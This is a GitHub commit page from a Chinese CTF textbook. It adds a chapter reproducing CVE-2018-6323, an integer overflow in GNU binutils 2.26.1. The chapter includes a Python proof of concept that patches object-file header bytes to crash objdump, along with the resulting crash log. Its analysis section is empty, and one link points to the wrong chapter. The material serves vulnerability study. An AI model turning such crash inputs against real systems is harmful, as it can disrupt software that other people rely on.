Skip to content

Commit

Permalink
add 7.1.7
Browse files Browse the repository at this point in the history
  • Loading branch information
@firmianay
firmianay committed Feb 15, 2018
1 parent c9a2f60 commit fc5f183
Show file tree
Hide file tree
Showing 6 changed files with 140 additions and 7 deletions.
2 changes: 1 addition & 1 deletion FAQ.md
View file
Expand Up @@ -18,7 +18,7 @@ CTF 是网络安全技术人员之间进行技术竞技的一种比赛形式,

- 有 pdf/epub/mobi 版本吗?

没有 epub/mobi 版本。暂时有 pdf,可在 GitBook 页面下载,未来考虑使用 Tex/LaTex 编写和编译,以提供更美观的 pdf。
,可在 GitBook 页面下载,未来考虑使用 Tex/LaTex 编写和编译,以提供更美观的 pdf。


- 我能打印本书或者作为教材教课吗?
Expand Down
4 changes: 4 additions & 0 deletions README.md
View file
Expand Up @@ -22,6 +22,10 @@ PDF 文件地址:
---
请查看 [CONTRIBUTION.md](CONTRIBUTION.md)

常见问题
---
请查看 [FAQ.md](FAQ.md)

致谢
---
请查看 [THANKS](THANKS)
Expand Down
1 change: 1 addition & 0 deletions SUMMARY.md
View file
Expand Up @@ -132,6 +132,7 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One
* [7.1.4 [CVE-2017-13089] wget 1.19.1 Buffer Overflow](doc/7.1.4_wget_2017-13089.md)
* [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](doc/7.1.5_glibc_2018-1000001.md)
* [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](doc/7.1.6_dnstracer_2017-9430.md)
* [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](doc/7.1.7_binutils_2018-6323.md)
* [八、附录](doc/8_appendix.md)
* [8.1 更多 Linux 工具](doc/8.1_Linuxtools.md)
* [8.2 更多 Windows 工具](doc/8.2_wintools.md)
Expand Down
110 changes: 110 additions & 0 deletions doc/7.1.7_binutils_2018-6323.md
View file
@@ -0,0 +1,110 @@
# 7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow

- [漏洞描述](#漏洞描述)
- [漏洞复现](#漏洞复现)
- [漏洞分析](#漏洞分析)
- [参考资料](#参考资料)


[下载文件](../src/exploit/7.1.6_dnstracer_2017-9430)

## 漏洞描述

## 漏洞复现
| |推荐使用的环境 | 备注 |
| --- | --- | --- |
| 操作系统 | Ubuntu 16.04 | 体系结构:64 位 |
| 调试器 | gdb-peda| 版本号:7.11.1 |
| 漏洞软件 | binutils | 版本号:2.26.1 |

编译安装 binutils:
```
$ wget https://ftp.gnu.org/gnu/binutils/binutils-2.26.1.tar.gz
$ tar zxvf binutils-2.26.1.tar.gz
$ cd binutils-2.26.1/
$ ./configure --enable-64-bit-bfd
$ make && sudo make install
$ file /usr/local/bin/objdump
/usr/local/bin/objdump: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=72a5ff5705687fd1aa6ee58aff08d57b87694cb4, not stripped
```

使用 PoC 如下:
```python
import os

hello = "#include<stdio.h>\nint main(){printf(\"HelloWorld!\\n\"); return 0;}"
f = open("helloWorld.c", 'w')
f.write(hello)
f.close()

os.system("gcc -c helloWorld.c -o test")

f = open("test", 'rb+')
f.read(0x2c)
f.write("\xff\xff") # 65535
f.read(0x244-0x2c-2)
f.write("\x00\x00\x00\x20") # 536870912
f.close()

os.system("objdump -x test")
```
```
$ python poc.py
objdump: test: File truncated
*** Error in `objdump': free(): invalid pointer: 0x09803aa8 ***
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x67377)[0xb75ef377]
/lib/i386-linux-gnu/libc.so.6(+0x6d2f7)[0xb75f52f7]
/lib/i386-linux-gnu/libc.so.6(+0x6dc31)[0xb75f5c31]
objdump[0x81421cb]
objdump[0x8091ab0]
objdump[0x809349c]
objdump[0x809400a]
objdump[0x80522aa]
objdump[0x804c17e]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf7)[0xb75a0637]
objdump[0x804c38a]
======= Memory map: ========
08048000-0822c000 r-xp 00000000 08:01 270806 /usr/local/bin/objdump
0822c000-0822d000 r--p 001e3000 08:01 270806 /usr/local/bin/objdump
0822d000-08231000 rw-p 001e4000 08:01 270806 /usr/local/bin/objdump
08231000-08237000 rw-p 00000000 00:00 0
09802000-09823000 rw-p 00000000 00:00 0 [heap]
b7200000-b7221000 rw-p 00000000 00:00 0
b7221000-b7300000 ---p 00000000 00:00 0
b7353000-b736f000 r-xp 00000000 08:01 394789 /lib/i386-linux-gnu/libgcc_s.so.1
b736f000-b7370000 rw-p 0001b000 08:01 394789 /lib/i386-linux-gnu/libgcc_s.so.1
b7387000-b7587000 r--p 00000000 08:01 141924 /usr/lib/locale/locale-archive
b7587000-b7588000 rw-p 00000000 00:00 0
b7588000-b7738000 r-xp 00000000 08:01 394751 /lib/i386-linux-gnu/libc-2.23.so
b7738000-b773a000 r--p 001af000 08:01 394751 /lib/i386-linux-gnu/libc-2.23.so
b773a000-b773b000 rw-p 001b1000 08:01 394751 /lib/i386-linux-gnu/libc-2.23.so
b773b000-b773e000 rw-p 00000000 00:00 0
b773e000-b7741000 r-xp 00000000 08:01 394775 /lib/i386-linux-gnu/libdl-2.23.so
b7741000-b7742000 r--p 00002000 08:01 394775 /lib/i386-linux-gnu/libdl-2.23.so
b7742000-b7743000 rw-p 00003000 08:01 394775 /lib/i386-linux-gnu/libdl-2.23.so
b7751000-b7752000 rw-p 00000000 00:00 0
b7752000-b7759000 r--s 00000000 08:01 139343 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache
b7759000-b775a000 r--p 00741000 08:01 141924 /usr/lib/locale/locale-archive
b775a000-b775c000 rw-p 00000000 00:00 0
b775c000-b775e000 r--p 00000000 00:00 0 [vvar]
b775e000-b7760000 r-xp 00000000 00:00 0 [vdso]
b7760000-b7782000 r-xp 00000000 08:01 394723 /lib/i386-linux-gnu/ld-2.23.so
b7782000-b7783000 rw-p 00000000 00:00 0
b7783000-b7784000 r--p 00022000 08:01 394723 /lib/i386-linux-gnu/ld-2.23.so
b7784000-b7785000 rw-p 00023000 08:01 394723 /lib/i386-linux-gnu/ld-2.23.so
bf85b000-bf87c000 rw-p 00000000 00:00 0 [stack]
Aborted (core dumped)
```

需要注意的是如果在 configure 的时候没有使用参数 `--enable-64-bit-bfd`,将会出现下面的结果:
```
$ python poc.py
objdump: test: File format not recognized
```


## 漏洞分析

## 参考资料
- [GNU binutils 2.26.1 - Integer Overflow (POC)](https://www.exploit-db.com/exploits/44035/)
13 changes: 7 additions & 6 deletions doc/7_exploit.md
View file
@@ -1,8 +1,9 @@
# 第七篇 实战篇

- [7.1.1 [CVE-2017-11543] tcpdump 4.9.0 Buffer Overflow](7.1.1_tcpdump_2017-11543.md)
- [7.1.2 [CVE-2015-0235] glibc 2.17 Buffer Overflow](7.1.2_glibc_2015-0235.md)
- [7.1.3 [CVE-2016-4971] wget 1.17.1 Arbitrary File Upload](7.1.3_wget_2016-4971.md)
- [7.1.4 [CVE-2017-13089] wget 1.19.1 Buffer Overflow](7.1.4_wget_2017-13089.md)
- [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](7.1.5_glibc_2018-1000001.md)
- [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](7.1.6_dnstracer_2017-9430.md)
- [7.1.1 [CVE-2017-11543] tcpdump 4.9.0 Buffer Overflow](7.1.1_tcpdump_2017-11543.md)
- [7.1.2 [CVE-2015-0235] glibc 2.17 Buffer Overflow](7.1.2_glibc_2015-0235.md)
- [7.1.3 [CVE-2016-4971] wget 1.17.1 Arbitrary File Upload](7.1.3_wget_2016-4971.md)
- [7.1.4 [CVE-2017-13089] wget 1.19.1 Buffer Overflow](7.1.4_wget_2017-13089.md)
- [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](7.1.5_glibc_2018-1000001.md)
- [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](7.1.6_dnstracer_2017-9430.md)
- [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](7.1.7_binutils_2018-6323.md)
17 changes: 17 additions & 0 deletions src/exploit/7.1.7_binutils_2018-6323/poc.py
View file
@@ -0,0 +1,17 @@
import os

hello = "#include<stdio.h>\nint main(){printf(\"HelloWorld!\\n\"); return 0;}"
f = open("helloWorld.c", 'w')
f.write(hello)
f.close()

os.system("gcc -c helloWorld.c -o test")

f = open("test", 'rb+')
f.read(0x2c)
f.write("\xff\xff") # 65535
f.read(0x244-0x2c-2)
f.write("\x00\x00\x00\x20") # 536870912
f.close()

os.system("objdump -x test")

0 comments on commit fc5f183

Please sign in to comment.